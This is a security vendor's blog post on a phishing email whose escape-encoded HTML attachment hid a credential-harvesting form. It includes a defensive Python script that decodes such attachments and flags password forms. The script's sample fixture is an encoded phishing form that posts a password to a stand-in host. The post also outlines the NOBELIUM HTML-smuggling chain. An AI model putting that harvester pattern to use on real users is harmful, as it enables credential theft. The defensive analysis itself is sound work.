Credential Stealing Email Located
We recently had a phishing investigation into an email with an HTML attachment that caught our eye. It caught our eye because Microsoft had just posted about an ongoing attack from NOBELIUM that used a similar delivery technique. The NOBELIUM attack chain was Phishing Email > HTML attachment > HTML Smuggling > Drop an ISO, which drops an LNK file that executes the Cobalt Strike Beacon loader. There is a bit more to it than that, but the HTML smuggling stage is where the two attacks luckily diverged.
After we obtained the email from the client, we were able to dig into what was going on inside the HTML attachment. The HTML was "obfuscated", but only in the loosest sense: the authors had "escaped" the characters in the document, the same kind of encoding that is common in web requests. We were able to recover the plaintext of the document trivially and then dug deeper into its functionality.
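The decoding step described above is easy to automate. The following Python script is an added example, not code from the original investigation or from MegaplanIT: it reverses JavaScript-style `escape()` encoding inside `unescape("...")` calls, runs until no encoded layer remains, and then looks for the signs of a credential harvester (a `<form>` posting somewhere and a password input). The sample attachment, the `example.invalid` host and all function names are constructed for the example.

```python
import re
import html
from urllib.parse import urlparse

# Constructed sample of an "escaped" HTML attachment (not the real attachment
# from the investigation). It writes a login form into the page at run time.
SAMPLE_ATTACHMENT = """<html><body><script>
document.write(unescape("%3Cform%20method%3D%22POST%22%20action%3D%22https%3A%2F%2Fexample.invalid%2Fverify.php%22%3E%3Cinput%20type%3D%22password%22%20name%3D%22pwd%22%3E%3C%2Fform%3E"));
</script></body></html>"""

# unescape('...') / unescape("...") calls, possibly spanning lines.
UNESCAPE_CALL = re.compile(r"""unescape\(\s*(['"])(.*?)\1\s*\)""", re.S)
# JavaScript escape() output: %uXXXX for non-Latin-1 code points, %XX otherwise.
PCT = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")
FORM_ACTION = re.compile(r"""<form[^>]*\baction\s*=\s*['"]([^'"]+)['"]""", re.I)
PASSWORD_INPUT = re.compile(r"""<input[^>]*\btype\s*=\s*['"]password['"]""", re.I)


def js_unescape(s: str) -> str:
    """Reverse JavaScript escape(): decode %uXXXX and %XX sequences."""
    def repl(m):
        if m.group(1):
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 16))
    return PCT.sub(repl, s)


def decode_attachment(text: str, max_rounds: int = 5) -> str:
    """Replace every unescape("...") call with its decoded content.

    Attackers sometimes nest layers, so repeat until nothing changes
    (bounded by max_rounds so a malformed file cannot loop forever).
    """
    for _ in range(max_rounds):
        decoded = UNESCAPE_CALL.sub(lambda m: js_unescape(m.group(2)), text)
        if decoded == text:
            break
        text = decoded
    # Undo any HTML entity encoding left over after the escape layers.
    return html.unescape(text)


def triage(text: str) -> dict:
    """Decode the attachment and summarise credential-harvesting indicators."""
    decoded = decode_attachment(text)
    actions = FORM_ACTION.findall(decoded)
    hosts = sorted({urlparse(a).hostname for a in actions if urlparse(a).hostname})
    password_fields = len(PASSWORD_INPUT.findall(decoded))
    return {
        "decoded": decoded,
        "form_actions": actions,          # where submitted credentials would go
        "post_hosts": hosts,              # candidate indicators for blocking
        "password_fields": password_fields,
        "credential_harvester": bool(actions) and password_fields > 0,
    }


if __name__ == "__main__":
    result = triage(SAMPLE_ATTACHMENT)
    print(result["decoded"])
    print("form actions:", result["form_actions"])
    print("credential harvester:", result["credential_harvester"])
```

The `post_hosts` list is the part worth feeding back into the response: the domain the form posts to is the indicator to block at the proxy and to search for in web logs, and a positive `credential_harvester` result with no dropper is exactly the situation where a password reset for the affected user is the primary remediation.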
We did not find any evidence of malware or dropper functionality inside the HTML file; the attachment's purpose was to steal credentials. Our recommendation was therefore to change the affected user's passwords.
Speak With A MegaplanIT Expert
We look forward to talking to you about your upcoming Security Testing, Compliance Assessments, and Managed Security Services priorities. Looking to double-check whether your digital infrastructure can withstand the latest cyber threats? The MegaplanIT team is ready to help. Set up a meeting time at the link below.